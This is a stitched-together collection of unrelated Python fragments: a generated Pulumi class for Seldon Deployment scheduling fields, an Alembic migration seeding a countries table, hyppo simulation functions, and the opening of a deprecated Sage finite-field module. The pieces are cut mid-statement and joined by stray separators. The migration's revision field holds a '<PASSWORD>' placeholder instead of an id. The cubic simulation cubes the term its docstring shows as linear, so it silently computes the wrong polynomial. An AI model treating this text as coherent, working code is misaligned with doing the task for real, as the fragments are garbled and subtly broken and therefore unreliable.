if toleration_seconds is not None:
pulumi.set(__self__, "toleration_seconds", toleration_seconds)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def effect(self) -> Optional[str]:
"""
Effect indicates the taint effect to match. Empty means match all taint effects. When specified, allowed values are NoSchedule, PreferNoSchedule and NoExecute.
"""
return pulumi.get(self, "effect")
@property
@pulumi.getter
def key(self) -> Optional[str]:
"""
Key is the taint key that the toleration applies to. Empty means match all taint keys. If the key is empty, operator must be Exists; this combination means to match all values and all keys.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter
def operator(self) -> Optional[str]:
"""
Operator represents a key's relationship to the value. Valid operators are Exists and Equal. Defaults to Equal. Exists is equivalent to wildcard for value, so that a pod can tolerate all taints of a particular category.
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter(name="tolerationSeconds")
def toleration_seconds(self) -> Optional[int]:
"""
TolerationSeconds represents the period of time the toleration (which must be of effect NoExecute, otherwise this field is ignored) tolerates the taint. By default, it is not set, which means tolerate the taint forever (do not evict). Zero and negative values will be treated as 0 (evict immediately) by the system.
"""
return pulumi.get(self, "toleration_seconds")
@property
@pulumi.getter
def value(self) -> Optional[str]:
"""
Value is the taint value the toleration matches to. If the operator is Exists, the value should be empty, otherwise just a regular string.
"""
return pulumi.get(self, "value")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsComponentSpecsSpecTopologySpreadConstraints(dict):
"""
TopologySpreadConstraint specifies how to spread matching pods among the given topology.
"""
def __init__(__self__, *,
max_skew: int,
topology_key: str,
when_unsatisfiable: str,
label_selector: Optional['outputs.SeldonDeploymentSpecPredictorsComponentSpecsSpecTopologySpreadConstraintsLabelSelector'] = None):
"""
TopologySpreadConstraint specifies how to spread matching pods among the given topology.
:param int max_skew: MaxSkew describes the degree to which pods may be unevenly distributed. It's the maximum permitted difference between the number of matching pods in any two topology domains of a given topology type. For example, in a 3-zone cluster, MaxSkew is set to 1, and pods with the same labelSelector spread as 1/1/0: | zone1 | zone2 | zone3 | | P | P | | - if MaxSkew is 1, incoming pod can only be scheduled to zone3 to become 1/1/1; scheduling it onto zone1(zone2) would make the ActualSkew(2-0) on zone1(zone2) violate MaxSkew(1). - if MaxSkew is 2, incoming pod can be scheduled onto any zone. It's a required field. Default value is 1 and 0 is not allowed.
:param str topology_key: TopologyKey is the key of node labels. Nodes that have a label with this key and identical values are considered to be in the same topology. We consider each <key, value> as a "bucket", and try to put balanced number of pods into each bucket. It's a required field.
:param str when_unsatisfiable: WhenUnsatisfiable indicates how to deal with a pod if it doesn't satisfy the spread constraint. - DoNotSchedule (default) tells the scheduler not to schedule it - ScheduleAnyway tells the scheduler to still schedule it It's considered as "Unsatisfiable" if and only if placing incoming pod on any topology violates "MaxSkew". For example, in a 3-zone cluster, MaxSkew is set to 1, and pods with the same labelSelector spread as 3/1/1: | zone1 | zone2 | zone3 | | P P P | P | P | If WhenUnsatisfiable is set to DoNotSchedule, incoming pod can only be scheduled to zone2(zone3) to become 3/2/1(3/1/2) as ActualSkew(2-1) on zone2(zone3) satisfies MaxSkew(1). In other words, the cluster can still be imbalanced, but scheduler won't make it *more* imbalanced. It's a required field.
:param 'SeldonDeploymentSpecPredictorsComponentSpecsSpecTopologySpreadConstraintsLabelSelectorArgs' label_selector: LabelSelector is used to find matching pods. Pods that match this label selector are counted to determine the number of pods in their corresponding topology domain.
"""
pulumi.set(__self__, "max_skew", max_skew)
pulumi.set(__self__, "topology_key", topology_key)
pulumi.set(__self__, "when_unsatisfiable", when_unsatisfiable)
if label_selector is not None:
pulumi.set(__self__, "label_selector", label_selector)
@property
@pulumi.getter(name="maxSkew")
def max_skew(self) -> int:
"""
MaxSkew describes the degree to which pods may be unevenly distributed. It's the maximum permitted difference between the number of matching pods in any two topology domains of a given topology type. For example, in a 3-zone cluster, MaxSkew is set to 1, and pods with the same labelSelector spread as 1/1/0: | zone1 | zone2 | zone3 | | P | P | | - if MaxSkew is 1, incoming pod can only be scheduled to zone3 to become 1/1/1; scheduling it onto zone1(zone2) would make the ActualSkew(2-0) on zone1(zone2) violate MaxSkew(1). - if MaxSkew is 2, incoming pod can be scheduled onto any zone. It's a required field. Default value is 1 and 0 is not allowed.
"""
return pulumi.get(self, "max_skew")
@property
@pulumi.getter(name="topologyKey")
def topology_key(self) -> str:
"""
TopologyKey is the key of node labels. Nodes that have a label with this key and identical values are considered to be in the same topology. We consider each <key, value> as a "bucket", and try to put balanced number of pods into each bucket. It's a required field.
"""
return pulumi.get(self, "topology_key")
@property
@pulumi.getter(name="whenUnsatisfiable")
def when_unsatisfiable(self) -> str:
"""
WhenUnsatisfiable indicates how to deal with a pod if it doesn't satisfy the spread constraint. - DoNotSchedule (default) tells the scheduler not to schedule it - ScheduleAnyway tells the scheduler to still schedule it It's considered as "Unsatisfiable" if and only if placing incoming pod on any topology violates "MaxSkew". For example, in a 3-zone cluster, MaxSkew is set to 1, and pods with the same labelSelector spread as 3/1/1: | zone1 | zone2 | zone3 | | P P P | P | P | If | |
<filename>migrations/versions/be21086640ad_country_added.py
"""Country added
Revision ID: be21086640ad
Revises: <PASSWORD>
Create Date: 2021-11-09 15:34:04.306218
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'be21086640ad'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
naming_convention = {
"ix": 'ix_%(column_0_label)s',
"uq": "uq_%(table_name)s_%(column_0_name)s",
"ck": "ck_%(table_name)s_%(column_0_name)s",
"fk": "fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s",
"pk": "pk_%(table_name)s"
}
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('countries',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('iso', sa.String(length=2), nullable=True),
sa.Column('name', sa.String(length=80), nullable=True),
sa.Column('nicename', sa.String(length=80), nullable=True),
sa.Column('iso3', sa.String(length=3), nullable=True),
sa.Column('numcode', sa.Integer(), nullable=True),
sa.Column('phonecode', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
with op.batch_alter_table('companies', schema=None, naming_convention=naming_convention) as batch_op:
batch_op.add_column(sa.Column('country_id', sa.Integer(), nullable=True))
batch_op.create_foreign_key(batch_op.f('fk_company_country_id_country'), 'countries', ['country_id'], ['id'])
# ### end Alembic commands ###
op.execute("""
INSERT INTO `countries` (`id`, `iso`, `name`, `nicename`, `iso3`, `numcode`, `phonecode`) VALUES
(1, 'AF', 'AFGHANISTAN', 'Afghanistan', 'AFG', 4, 93),
(2, 'AL', 'ALBANIA', 'Albania', 'ALB', 8, 355),
(3, 'DZ', 'ALGERIA', 'Algeria', 'DZA', 12, 213),
(4, 'AS', 'AMERICAN SAMOA', 'American Samoa', 'ASM', 16, 1684),
(5, 'AD', 'ANDORRA', 'Andorra', 'AND', 20, 376),
(6, 'AO', 'ANGOLA', 'Angola', 'AGO', 24, 244),
(7, 'AI', 'ANGUILLA', 'Anguilla', 'AIA', 660, 1264),
(8, 'AQ', 'ANTARCTICA', 'Antarctica', NULL, NULL, 0),
(9, 'AG', 'ANTIGUA AND BARBUDA', 'Antigua and Barbuda', 'ATG', 28, 1268),
(10, 'AR', 'ARGENTINA', 'Argentina', 'ARG', 32, 54),
(11, 'AM', 'ARMENIA', 'Armenia', 'ARM', 51, 374),
(12, 'AW', 'ARUBA', 'Aruba', 'ABW', 533, 297),
(13, 'AU', 'AUSTRALIA', 'Australia', 'AUS', 36, 61),
(14, 'AT', 'AUSTRIA', 'Austria', 'AUT', 40, 43),
(15, 'AZ', 'AZERBAIJAN', 'Azerbaijan', 'AZE', 31, 994),
(16, 'BS', 'BAHAMAS', 'Bahamas', 'BHS', 44, 1242),
(17, 'BH', 'BAHRAIN', 'Bahrain', 'BHR', 48, 973),
(18, 'BD', 'BANGLADESH', 'Bangladesh', 'BGD', 50, 880),
(19, 'BB', 'BARBADOS', 'Barbados', 'BRB', 52, 1246),
(20, 'BY', 'BELARUS', 'Belarus', 'BLR', 112, 375),
(21, 'BE', 'BELGIUM', 'Belgium', 'BEL', 56, 32),
(22, 'BZ', 'BELIZE', 'Belize', 'BLZ', 84, 501),
(23, 'BJ', 'BENIN', 'Benin', 'BEN', 204, 229),
(24, 'BM', 'BERMUDA', 'Bermuda', 'BMU', 60, 1441),
(25, 'BT', 'BHUTAN', 'Bhutan', 'BTN', 64, 975),
(26, 'BO', 'BOLIVIA', 'Bolivia', 'BOL', 68, 591),
(27, 'BA', 'BOSNIA AND HERZEGOVINA', 'Bosnia and Herzegovina', 'BIH', 70, 387),
(28, 'BW', 'BOTSWANA', 'Botswana', 'BWA', 72, 267),
(29, 'BV', 'BOUVET ISLAND', 'Bouvet Island', NULL, NULL, 0),
(30, 'BR', 'BRAZIL', 'Brazil', 'BRA', 76, 55),
(31, 'IO', 'BRITISH INDIAN OCEAN TERRITORY', 'British Indian Ocean Territory', NULL, NULL, 246),
(32, 'BN', 'BRUNEI DARUSSALAM', 'Brunei Darussalam', 'BRN', 96, 673),
(33, 'BG', 'BULGARIA', 'Bulgaria', 'BGR', 100, 359),
(34, 'BF', 'BURKINA FASO', 'Burkina Faso', 'BFA', 854, 226),
(35, 'BI', 'BURUNDI', 'Burundi', 'BDI', 108, 257),
(36, 'KH', 'CAMBODIA', 'Cambodia', 'KHM', 116, 855),
(37, 'CM', 'CAMEROON', 'Cameroon', 'CMR', 120, 237),
(38, 'CA', 'CANADA', 'Canada', 'CAN', 124, 1),
(39, 'CV', 'CAPE VERDE', 'Cape Verde', 'CPV', 132, 238),
(40, 'KY', 'CAYMAN ISLANDS', 'Cayman Islands', 'CYM', 136, 1345),
(41, 'CF', 'CENTRAL AFRICAN REPUBLIC', 'Central African Republic', 'CAF', 140, 236),
(42, 'TD', 'CHAD', 'Chad', 'TCD', 148, 235),
(43, 'CL', 'CHILE', 'Chile', 'CHL', 152, 56),
(44, 'CN', 'CHINA', 'China', 'CHN', 156, 86),
(45, 'CX', 'CHRISTMAS ISLAND', 'Christmas Island', NULL, NULL, 61),
(46, 'CC', 'COCOS (KEELING) ISLANDS', 'Cocos (Keeling) Islands', NULL, NULL, 672),
(47, 'CO', 'COLOMBIA', 'Colombia', 'COL', 170, 57),
(48, 'KM', 'COMOROS', 'Comoros', 'COM', 174, 269),
(49, 'CG', 'CONGO', 'Congo', 'COG', 178, 242),
(50, 'CD', 'CONGO, THE DEMOCRATIC REPUBLIC OF THE', 'Congo, the Democratic Republic of the', 'COD', 180, 242),
(51, 'CK', 'COOK ISLANDS', 'Cook Islands', 'COK', 184, 682),
(52, 'CR', 'COSTA RICA', 'Costa Rica', 'CRI', 188, 506),
(53, 'CI', 'COTE D''IVOIRE', 'Cote D''Ivoire', 'CIV', 384, 225),
(54, 'HR', 'CROATIA', 'Croatia', 'HRV', 191, 385),
(55, 'CU', 'CUBA', 'Cuba', 'CUB', 192, 53),
(56, 'CY', 'CYPRUS', 'Cyprus', 'CYP', 196, 357),
(57, 'CZ', 'CZECH REPUBLIC', 'Czech Republic', 'CZE', 203, 420),
(58, 'DK', 'DENMARK', 'Denmark', 'DNK', 208, 45),
(59, 'DJ', 'DJIBOUTI', 'Djibouti', 'DJI', 262, 253),
(60, 'DM', 'DOMINICA', 'Dominica', 'DMA', 212, 1767),
(61, 'DO', 'DOMINICAN REPUBLIC', 'Dominican Republic', 'DOM', 214, 1809),
(62, 'EC', 'ECUADOR', 'Ecuador', 'ECU', 218, 593),
(63, 'EG', 'EGYPT', 'Egypt', 'EGY', 818, 20),
(64, 'SV', 'EL SALVADOR', 'El Salvador', 'SLV', 222, 503),
(65, 'GQ', 'EQUATORIAL GUINEA', 'Equatorial Guinea', 'GNQ', 226, 240),
(66, 'ER', 'ERITREA', 'Eritrea', 'ERI', 232, 291),
(67, 'EE', 'ESTONIA', 'Estonia', 'EST', 233, 372),
(68, 'ET', 'ETHIOPIA', 'Ethiopia', 'ETH', 231, 251),
(69, 'FK', 'FALKLAND ISLANDS (MALVINAS)', 'Falkland Islands (Malvinas)', 'FLK', 238, 500),
(70, 'FO', 'FAROE ISLANDS', 'Faroe Islands', 'FRO', 234, 298),
(71, 'FJ', 'FIJI', 'Fiji', 'FJI', 242, 679),
(72, 'FI', 'FINLAND', 'Finland', 'FIN', 246, 358),
(73, 'FR', 'FRANCE', 'France', 'FRA', 250, 33),
(74, 'GF', 'FRENCH GUIANA', 'French Guiana', 'GUF', 254, 594),
(75, 'PF', 'FRENCH POLYNESIA', 'French Polynesia', 'PYF', 258, 689),
(76, 'TF', 'FRENCH SOUTHERN TERRITORIES', 'French Southern Territories', NULL, NULL, 0),
(77, 'GA', 'GABON', 'Gabon', 'GAB', 266, 241),
(78, 'GM', 'GAMBIA', 'Gambia', 'GMB', 270, 220),
(79, 'GE', 'GEORGIA', 'Georgia', 'GEO', 268, 995),
(80, 'DE', 'GERMANY', 'Germany', 'DEU', 276, 49),
(81, 'GH', 'GHANA', 'Ghana', 'GHA', 288, 233),
(82, 'GI', 'GIBRALTAR', 'Gibraltar', 'GIB', 292, 350),
(83, 'GR', 'GREECE', 'Greece', 'GRC', 300, 30),
(84, 'GL', 'GREENLAND', 'Greenland', 'GRL', 304, 299),
(85, 'GD', 'GRENADA', 'Grenada', 'GRD', 308, 1473),
(86, 'GP', 'GUADELOUPE', 'Guadeloupe', 'GLP', 312, 590),
(87, 'GU', 'GUAM', 'Guam', 'GUM', 316, 1671),
(88, 'GT', 'GUATEMALA', 'Guatemala', 'GTM', 320, 502),
(89, 'GN', 'GUINEA', 'Guinea', 'GIN', 324, 224),
(90, 'GW', 'GUINEA-BISSAU', 'Guinea-Bissau', 'GNB', 624, 245),
(91, 'GY', 'GUYANA', 'Guyana', 'GUY', 328, 592),
(92, 'HT', 'HAITI', 'Haiti', 'HTI', 332, 509),
(93, 'HM', 'HEARD ISLAND AND MCDONALD ISLANDS', 'Heard Island and Mcdonald Islands', NULL, NULL, 0),
(94, 'VA', 'HOLY SEE (VATICAN CITY STATE)', 'Holy See (Vatican City State)', 'VAT', 336, 39),
(95, 'HN', 'HONDURAS', 'Honduras', 'HND', 340, 504),
(96, 'HK', 'HONG KONG', 'Hong Kong', 'HKG', 344, 852),
(97, 'HU', 'HUNGARY', 'Hungary', 'HUN', 348, 36),
(98, 'IS', 'ICELAND', 'Iceland', 'ISL', 352, 354),
(99, 'IN', 'INDIA', 'India', 'IND', 356, 91),
(100, 'ID', 'INDONESIA', 'Indonesia', 'IDN', 360, 62),
(101, 'IR', 'IRAN, ISLAMIC REPUBLIC OF', 'Iran, Islamic Republic of', 'IRN', 364, 98),
(102, 'IQ', 'IRAQ', 'Iraq', 'IRQ', 368, 964),
(103, 'IE', 'IRELAND', 'Ireland', 'IRL', 372, 353),
(104, 'IL', 'ISRAEL', 'Israel', 'ISR', 376, 972),
(105, 'IT', 'ITALY', 'Italy', 'ITA', 380, 39),
(106, 'JM', 'JAMAICA', 'Jamaica', 'JAM', 388, 1876),
(107, 'JP', 'JAPAN', 'Japan', 'JPN', 392, 81),
(108, 'JO', 'JORDAN', 'Jordan', 'JOR', 400, 962),
(109, 'KZ', 'KAZAKHSTAN', 'Kazakhstan', 'KAZ', 398, 7),
(110, 'KE', 'KENYA', 'Kenya', 'KEN', 404, 254),
(111, 'KI', 'KIRIBATI', 'Kiribati', 'KIR', 296, 686),
(112, 'KP', 'KOREA, DEMOCRATIC PEOPLE''S REPUBLIC OF', 'Korea, Democratic People''s Republic of', 'PRK', 408, 850),
(113, 'KR', 'KOREA, REPUBLIC OF', 'Korea, Republic of', 'KOR', 410, 82),
(114, 'KW', 'KUWAIT', 'Kuwait', 'KWT', 414, 965),
(115, 'KG', 'KYRGYZSTAN', 'Kyrgyzstan', 'KGZ', 417, 996),
(116, 'LA', 'LAO PEOPLE''S DEMOCRATIC REPUBLIC', 'Lao People''s Democratic Republic', 'LAO', 418, 856),
(117, 'LV', 'LATVIA', 'Latvia', 'LVA', 428, 371),
(118, 'LB', 'LEBANON', 'Lebanon', 'LBN', 422, 961),
(119, 'LS', 'LESOTHO', 'Lesotho', 'LSO', 426, 266),
(120, 'LR', 'LIBERIA', 'Liberia', 'LBR', 430, 231),
(121, 'LY', '<NAME>', 'Libyan Arab Jamahiriya', 'LBY', 434, 218),
(122, 'LI', 'LIECHTENSTEIN', 'Liechtenstein', 'LIE', 438, 423),
(123, 'LT', 'LITHUANIA', 'Lithuania', 'LTU', 440, 370),
(124, 'LU', 'LUXEMBOURG', 'Luxembourg', 'LUX', 442, 352),
(125, 'MO', 'MACAO', 'Macao', 'MAC', 446, 853),
(126, 'MK', 'MACEDONIA, THE FORMER YUGOSLAV REPUBLIC OF', 'Macedonia, the Former Yugoslav Republic of', 'MKD', 807, 389),
(127, 'MG', 'MADAGASCAR', 'Madagascar', 'MDG', 450, 261),
(128, 'MW', 'MALAWI', 'Malawi', 'MWI', 454, 265),
(129, 'MY', 'MALAYSIA', 'Malaysia', 'MYS', 458, 60),
(130, 'MV', 'MALDIVES', 'Maldives', 'MDV', 462, 960),
(131, 'ML', 'MALI', 'Mali', 'MLI', 466, 223),
(132, 'MT', 'MALTA', 'Malta', 'MLT', 470, 356),
(133, 'MH', 'MARSHALL ISLANDS', 'Marshall Islands', 'MHL', 584, 692),
(134, 'MQ', 'MARTINIQUE', 'Martinique', 'MTQ', 474, 596),
(135, 'MR', 'MAURITANIA', 'Mauritania', 'MRT', 478, 222),
(136, 'MU', 'MAURITIUS', 'Mauritius', 'MUS', 480, 230),
(137, 'YT', 'MAYOTTE', 'Mayotte', NULL, NULL, 269),
(138, 'MX', 'MEXICO', 'Mexico', 'MEX', 484, 52),
(139, 'FM', 'MICRONESIA, FEDERATED STATES OF', 'Micronesia, Federated States of', 'FSM', 583, 691),
(140, 'MD', 'MOLDOVA, REPUBLIC OF', 'Moldova, Republic of', 'MDA', 498, 373),
(141, 'MC', 'MONACO', 'Monaco', 'MCO', 492, 377),
(142, 'MN', 'MONGOLIA', 'Mongolia', 'MNG', 496, 976),
(143, 'MS', 'MONTSERRAT', 'Montserrat', 'MSR', 500, 1664),
(144, 'MA', 'MOROCCO', 'Morocco', 'MAR', 504, 212),
(145, 'MZ', 'MOZAMBIQUE', 'Mozambique', 'MOZ', 508, 258),
(146, 'MM', 'MYANMAR', 'Myanmar', 'MMR', 104, 95),
(147, 'NA', 'NAMIBIA', 'Namibia', 'NAM', 516, 264),
(148, 'NR', 'NAURU', 'Nauru', 'NRU', 520, 674),
(149, 'NP', 'NEPAL', 'Nepal', 'NPL', 524, 977),
(150, 'NL', 'NETHERLANDS', 'Netherlands', 'NLD', 528, 31),
(151, 'AN', 'NETHERLANDS ANTILLES', 'Netherlands Antilles', 'ANT', 530, 599),
(152, 'NC', 'NEW CALEDONIA', 'New Caledonia', 'NCL', 540, 687),
(153, 'NZ', 'NEW ZEALAND', 'New Zealand', 'NZL', 554, 64),
(154, 'NI', 'NICARAGUA', 'Nicaragua', 'NIC', 558, 505),
(155, 'NE', 'NIGER', 'Niger', 'NER', 562, 227),
(156, 'NG', 'NIGERIA', 'Nigeria', 'NGA', 566, 234),
(157, 'NU', 'NIUE', 'Niue', 'NIU', 570, 683),
(158, 'NF', 'NORFOLK ISLAND', 'Norfolk Island', 'NFK', 574, 672),
(159, 'MP', 'NORTHERN MARIANA ISLANDS', 'Northern Mariana Islands', 'MNP', 580, 1670),
(160, 'NO', 'NORWAY', 'Norway', 'NOR', 578, 47),
(161, 'OM', 'OMAN', 'Oman', 'OMN', 512, 968),
(162, 'PK', 'PAKISTAN', 'Pakistan', 'PAK', 586, 92),
(163, 'PW', 'PALAU', 'Palau', 'PLW', 585, 680),
(164, 'PS', 'PALESTINIAN TERRITORY, OCCUPIED', 'Palestinian Territory, Occupied', NULL, NULL, 970),
(165, 'PA', 'PANAMA', 'Panama', 'PAN', 591, 507),
(166, 'PG', 'PAPUA NEW GUINEA', 'Papua New Guinea', 'PNG', 598, 675),
(167, 'PY', 'PARAGUAY', 'Paraguay', 'PRY', 600, 595),
(168, 'PE', 'PERU', 'Peru', 'PER', 604, 51),
(169, 'PH', 'PHILIPPINES', 'Philippines', 'PHL', 608, 63),
(170, 'PN', | |
<reponame>RebeccaYin7/hyppo
import numpy as np
class _CheckInputs:
""" Check if additional arguments are correct """
def __init__(self, n, p):
self.n = n
self.p = p
def __call__(self, *args):
if type(self.n) is not int or type(self.p) is not int:
raise ValueError("n and p must be ints")
if self.n < 5 or self.p < 1:
raise ValueError(
"n must be greater than or equal to 5 and p "
"must be greater than or equal to than 1"
)
for arg in args:
if arg[1] is float and type(arg[0]) is int:
continue
if type(arg[0]) is not arg[1]:
raise ValueError("Incorrect input variable type")
def _gen_coeffs(p):
"""Calculates coefficients polynomials"""
return np.array([1 / (i + 1) for i in range(p)]).reshape(-1, 1)
def _random_uniform(n, p, low=-1, high=1):
"""Generate random uniform data"""
return np.array(np.random.uniform(low, high, size=(n, p)))
def _calc_eps(n):
"""Calculate noise"""
return np.random.normal(0, 1, size=(n, 1))
def linear(n, p, noise=False, low=-1, high=1):
r"""
Simulates univariate or multivariate linear data.
Parameters
----------
n : int
The number of samples desired by the simulation.
p : int
The number of dimensions desired by the simulation.
noise : bool, (default: False)
Whether or not to include noise in the simulation.
low : float, (default: -1)
The lower limit of the uniform distribution simulated from.
high : float, (default: -1)
The upper limit of the uniform distribution simulated from.
Returns
-------
x, y : ndarray
Simulated data matrices. `x` and `y` have shapes `(n, p)` and `(n, 1)`
where `n` is the number of samples and `p` is the number of
dimensions.
Notes
-----
Linear :math:`(X, Y) \in \mathbb{R}^p \times \mathbb{R}`:
.. math::
X &\sim \mathcal{U}(-1, 1)^p \\
Y &= w^T X + \kappa \epsilon
Examples
--------
>>> from hyppo.sims import linear
>>> x, y = linear(100, 2)
>>> print(x.shape, y.shape)
(100, 2) (100, 1)
"""
extra_args = [(noise, bool), (low, float), (high, float)]
check_in = _CheckInputs(n, p)
check_in(*extra_args)
x = _random_uniform(n, p, low, high)
coeffs = _gen_coeffs(p)
eps = _calc_eps(n)
y = x @ coeffs + 1 * noise * eps
return x, y
def exponential(n, p, noise=False, low=0, high=3):
r"""
Simulates univariate or multivariate exponential data.
Parameters
----------
n : int
The number of samples desired by the simulation.
p : int
The number of dimensions desired by the simulation.
noise : bool, (default: False)
Whether or not to include noise in the simulation.
low : float, (default: 0)
The lower limit of the uniform distribution simulated from.
high : float, (default: 3)
The upper limit of the uniform distribution simulated from.
Returns
-------
x, y : ndarray
Simulated data matrices. `x` and `y` have shapes `(n, p)` and `(n, 1)`
where `n` is the number of samples and `p` is the number of
dimensions.
Notes
-----
Exponential :math:`(X, Y) \in \mathbb{R}^p \times \mathbb{R}`:
.. math::
X &\sim \mathcal{U}(0, 3)^p \\
Y &= \exp (w^T X) + 10 \kappa \epsilon
Examples
--------
>>> from hyppo.sims import exponential
>>> x, y = exponential(100, 2)
>>> print(x.shape, y.shape)
(100, 2) (100, 1)
"""
extra_args = [(noise, bool), (low, float), (high, float)]
check_in = _CheckInputs(n, p)
check_in(*extra_args)
x = _random_uniform(n, p, low, high)
coeffs = _gen_coeffs(p)
eps = _calc_eps(n)
y = np.exp(x @ coeffs) + 10 * noise * eps
return x, y
def cubic(n, p, noise=False, low=-1, high=1, cubs=[-12, 48, 128], scale=1 / 3):
r"""
Simulates univariate or multivariate cubic data.
Parameters
----------
n : int
The number of samples desired by the simulation.
p : int
The number of dimensions desired by the simulation.
noise : bool, (default: False)
Whether or not to include noise in the simulation.
low : float, (default: -1)
The lower limit of the uniform distribution simulated from.
high : float, (default: -1)
The upper limit of the uniform distribution simulated from.
cubs : list of ints (default: [-12, 48, 128])
Coefficients of the cubic function where each value corresponds to the
order of the cubic polynomial.
scale : float (default: 1/3)
Scaling center of the cubic.
Returns
-------
x, y : ndarray
Simulated data matrices. `x` and `y` have shapes `(n, p)` and `(n, 1)`
where `n` is the number of samples and `p` is the number of
dimensions.
Notes
-----
Cubic :math:`(X, Y) \in \mathbb{R}^p \times \mathbb{R}`:
.. math::
X &\sim \mathcal{U}(-1, 1)^p \\
Y &= 128 \left( w^T X - \frac{1}{3} \right)^3
+ 48 \left( w^T X - \frac{1}{3} \right)^2
- 12 \left( w^T X - \frac{1}{3} \right)
+ 80 \kappa \epsilon
Examples
--------
>>> from hyppo.sims import cubic
>>> x, y = cubic(100, 2)
>>> print(x.shape, y.shape)
(100, 2) (100, 1)
"""
extra_args = [
(noise, bool),
(low, float),
(high, float),
(cubs, list),
(scale, float),
]
check_in = _CheckInputs(n, p)
check_in(*extra_args)
x = _random_uniform(n, p, low, high)
coeffs = _gen_coeffs(p)
eps = _calc_eps(n)
x_coeffs = x @ coeffs - scale
y = (
cubs[2] * x_coeffs ** 3
+ cubs[1] * x_coeffs ** 2
+ cubs[0] * x_coeffs ** 3
+ 80 * noise * eps
)
return x, y
def joint_normal(n, p, noise=False):
r"""
Simulates univariate or multivariate joint-normal data.
Parameters
----------
n : int
The number of samples desired by the simulation.
p : int
The number of dimensions desired by the simulation.
noise : bool, (default: False)
Whether or not to include noise in the simulation.
Returns
-------
x, y : ndarray
Simulated data matrices. `x` and `y` have shapes `(n, p)` and `(n, p)`
where `n` is the number of samples and `p` is the number of
dimensions.
Notes
-----
Joint Normal :math:`(X, Y) \in \mathbb{R}^p \times \mathbb{R}^p`: Let
:math:`\rho = \frac{1}{2} p`, :math:`I_p` be the identity matrix of size
:math:`p \times p`, :math:`J_p` be the matrix of ones of size
:math:`p \times p` and
:math:`\Sigma = \begin{bmatrix} I_p & \rho J_p \\ \rho J_p & (1 + 0.5\kappa) I_p \end{bmatrix}`. Then,
.. math::
(X, Y) \sim \mathcal{N}(0, \Sigma)
Examples
--------
>>> from hyppo.sims import joint_normal
>>> x, y = joint_normal(100, 2)
>>> print(x.shape, y.shape)
(100, 2) (100, 2)
"""
if p > 10:
raise ValueError("Covariance matrix for p>10 is not positive" "semi-definite")
extra_args = [(noise, bool)]
check_in = _CheckInputs(n, p)
check_in(*extra_args)
rho = 1 / (2 * p)
cov1 = np.concatenate((np.identity(p), rho * np.ones((p, p))), axis=1)
cov2 = np.concatenate((rho * np.ones((p, p)), np.identity(p)), axis=1)
covT = np.concatenate((cov1.T, cov2.T), axis=1)
eps = _calc_eps(n)
x = np.random.multivariate_normal(np.zeros(2 * p), covT, n)
y = x[:, p : 2 * p] + 0.5 * noise * eps
x = x[:, :p]
return x, y
def step(n, p, noise=False, low=-1, high=1):
r"""
Simulates univariate or multivariate step data.
Parameters
----------
n : int
The number of samples desired by the simulation.
p : int
The number of dimensions desired by the simulation.
noise : bool, (default: False)
Whether or not to include noise in the simulation.
low : float, (default: -1)
The lower limit of the uniform distribution simulated from.
high : float, (default: -1)
The upper limit of the uniform distribution simulated from.
Returns
-------
x, y : ndarray
Simulated data matrices. `x` and `y` have shapes `(n, p)` and `(n, 1)`
where `n` is the number of samples and `p` is the number of
dimensions.
Notes
-----
Step :math:`(X, Y) \in \mathbb{R}^p \times \mathbb{R}`:
.. math::
X &\sim \mathcal{U}(-1, 1)^p \\
Y &= \mathbb{1}_{w^T X > 0} + \epsilon
where :math:`\mathbb{1}` is the indicator function.
Examples
--------
>>> from hyppo.sims import step
>>> x, y = step(100, 2)
>>> print(x.shape, y.shape)
(100, 2) (100, 1)
"""
extra_args = [(noise, bool), (low, float), (high, float)]
check_in = _CheckInputs(n, p)
check_in(*extra_args)
if p > 1:
noise = True
x = _random_uniform(n, p, low, high)
coeffs = _gen_coeffs(p)
eps = _calc_eps(n)
x_coeff = ((x @ coeffs) > 0) * 1
y = x_coeff + noise * eps
return x, y
def quadratic(n, p, noise=False, low=-1, high=1):
r"""
Simulates univariate or multivariate quadratic data.
Parameters
| |
<filename>src/sage/rings/finite_rings/finite_field_ext_pari.py
"""
Finite Extension Fields implemented via PARI POLMODs (deprecated)
AUTHORS:
- <NAME>: initial version
- <NAME> (2010-12-16): fix formatting of docstrings (:trac:`10487`)
"""
#*****************************************************************************
# Copyright (C) 2005,2007 <NAME> <<EMAIL>>
# Copyright (C) 2010 <NAME> <<EMAIL>>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
import sage.rings.polynomial.polynomial_element as polynomial_element
import sage.rings.polynomial.multi_polynomial_element as multi_polynomial_element
import sage.rings.integer as integer
import sage.rings.rational as rational
import sage.libs.pari.all as pari
import element_ext_pari
from sage.rings.finite_rings.finite_field_base import FiniteField as FiniteField_generic
import sage.interfaces.gap
class FiniteField_ext_pari(FiniteField_generic):
r"""
Finite Field of order `q`, where `q` is a prime power (not a prime),
implemented using PARI ``POLMOD``. This implementation is the default
implementation for `q \geq 2^{16}`.
INPUT:
- ``q`` -- integer, size of the finite field, not prime
- ``name`` -- variable name used for printing elements of the
finite field
- ``modulus`` -- an irreducible polynomial to construct this field.
OUTPUT:
A finite field of order `q` with the given variable name
EXAMPLES::
sage: P.<x> = PolynomialRing(GF(3))
sage: from sage.rings.finite_rings.finite_field_ext_pari import FiniteField_ext_pari
sage: k = FiniteField_ext_pari(9, 'a', modulus=(x^2 + 2*x + 2))
doctest:...: DeprecationWarning: The "pari_mod" finite field implementation is deprecated
See http://trac.sagemath.org/17297 for details.
sage: k
Finite Field in a of size 3^2
sage: k.is_field()
True
sage: k.characteristic()
3
sage: a = k.gen()
sage: a
a
sage: a.parent()
Finite Field in a of size 3^2
sage: a.charpoly('x')
x^2 + 2*x + 2
sage: [a^i for i in range(8)]
[1, a, a + 1, 2*a + 1, 2, 2*a, 2*a + 2, a + 2]
